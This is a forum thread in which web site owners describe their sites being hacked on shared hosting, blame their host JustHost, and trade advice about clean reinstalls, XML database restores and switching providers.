        Yeah! Had a similar issue in past with some low-life host for my blog network sites and XML db export and import worked just fine. My sites were hacked because some other user's account on the same server was compromised and hacker was able to have access to the root of the server. Errrrr...big time nightmare.
        Signature

        {{ DiscussionBoard.errors[6842802].message }}
        • Profile picture of the author nik0
          Banned
          Originally Posted by Oranges View Post

          Yeah! Had a similar issue in past with some low-life host for my blog network sites and XML db export and import worked just fine. My sites were hacked because some other user's account on the same server was compromised and hacker was able to have access to the root of the server. Errrrr...big time nightmare.
          Pfff nice protection those hosting sites have.

          You think it might be smart to re-addon the domains in the cpanel?
          {{ DiscussionBoard.errors[6842923].message }}
          • Profile picture of the author Oranges
            Originally Posted by nik0 View Post

            Pfff nice protection those hosting sites have.
            You think it might be smart to re-addon the domains in the cpanel?
            Avoid that if you can, because if that happened because of some other user's account got compromised then there is nothing you can do about it and it will keep coming.

            But yes if it is happening because of old site backups are being restored, then doing a new clean install and restoring the site via XML DB can work, because there won't be any malicious code restored via the php files or infected MYSQL DB. It will be all fresh, clean a completely new install.
            Signature

            {{ DiscussionBoard.errors[6843033].message }}
  • Profile picture of the author mosthost
    I would move hosts and try a XML DB restore like Oranges said. Fact is, if the host has their PHP.INI setup right, this can't even happen. That's why managed hosting is always a good idea.

    9 times out of 10 they used a plugin to get in.
    {{ DiscussionBoard.errors[6843219].message }}
    • Profile picture of the author Mike Anthony
      Originally Posted by mosthost View Post

      I would move hosts and try a XML DB restore like Oranges said.
      Or that. I'd definitely be out of there. Yo Most digging the sig. Oh the irony. ROFL.
      Signature

      {{ DiscussionBoard.errors[6843266].message }}
  • Profile picture of the author John34
    I don't think its issue with Justhost, i myself got 6 sites hosted with them from last 8 months and never faced any issue.
    {{ DiscussionBoard.errors[6844535].message }}
    • Profile picture of the author nik0
      Banned
      Originally Posted by John34 View Post

      I don't think its issue with Justhost, i myself got 6 sites hosted with them from last 8 months and never faced any issue.
      I also had no problems for the first 4 months.

      Obvious it can have tons of reasons but when you get the support saying that it's a Google cache problem cause when he typed in the url in the adressbar and he didn't get redirected and DID get redirected when he searched my site from Google, while explaining a ton of times that it's NOT a cache problem then I'm getting pretty mad. It's also totally worthless that they don't have any virus checking on their hostings. Many have already confirmed that Hostgator solves these issue's in minutes and I have to spend countless hours/days to get things fixed.
      {{ DiscussionBoard.errors[6844994].message }}
  • Profile picture of the author vidrine
    1) Since I've been with JustHost, ALL my sites been hacked twice. Of course, their answer was that I must have given out my password to someone, which is bollocks.
    2) The have changed my fixed IP address TWICE without notifying me, which, of course totally defeats the purpose of purchasing an IP address.
    3) Since that last fiasco, I moved everything to GoDaddy, which I've NEVER had issues with.
    4) Got an email today that I've again been hacked and they "disabled" my account. Even though I am no longer using the account, I checked into it ... in case I might need it again (HAH!)
    5) They would not delete the supposedly offending files, but only leave me a ".malware.txt" file listing supposedly hacked files. Three files were indeed hacked, which were phising. The dozens other files listed were fine and untouched.
    6) I called back to inform them that the hacked files were removed. They again "scanned" the sites, then told me that there were numerous hacked files remaining.
    7) Apparently, they have problems differentiating between "good" and "bad" scripts, and are willing to leave you JustHanging out there.

    Thankfully, I have everything sound and secure on GoDaddy's sites, and JustHost will never, ever, get another nickel from me. When a site that isn't even online gets hacekd .... what else could it be but the host?
    {{ DiscussionBoard.errors[7055081].message }}
    • Profile picture of the author Nelapsi
      Originally Posted by vidrine View Post

      Thankfully, I have everything sound and secure on GoDaddy's sites, and JustHost will never, ever, get another nickel from me. When a site that isn't even online gets hacekd .... what else could it be but the host?
      And on Godaddy.. the server I was on was hacked once and then had another client on the box taking up all the resources which was causing my site to generate 500 errors (and a few other clients). Godaddy solution, I upgrade to a VPS. I went for a refund rather then an upgrade.
      {{ DiscussionBoard.errors[7055110].message }}

Trending Topics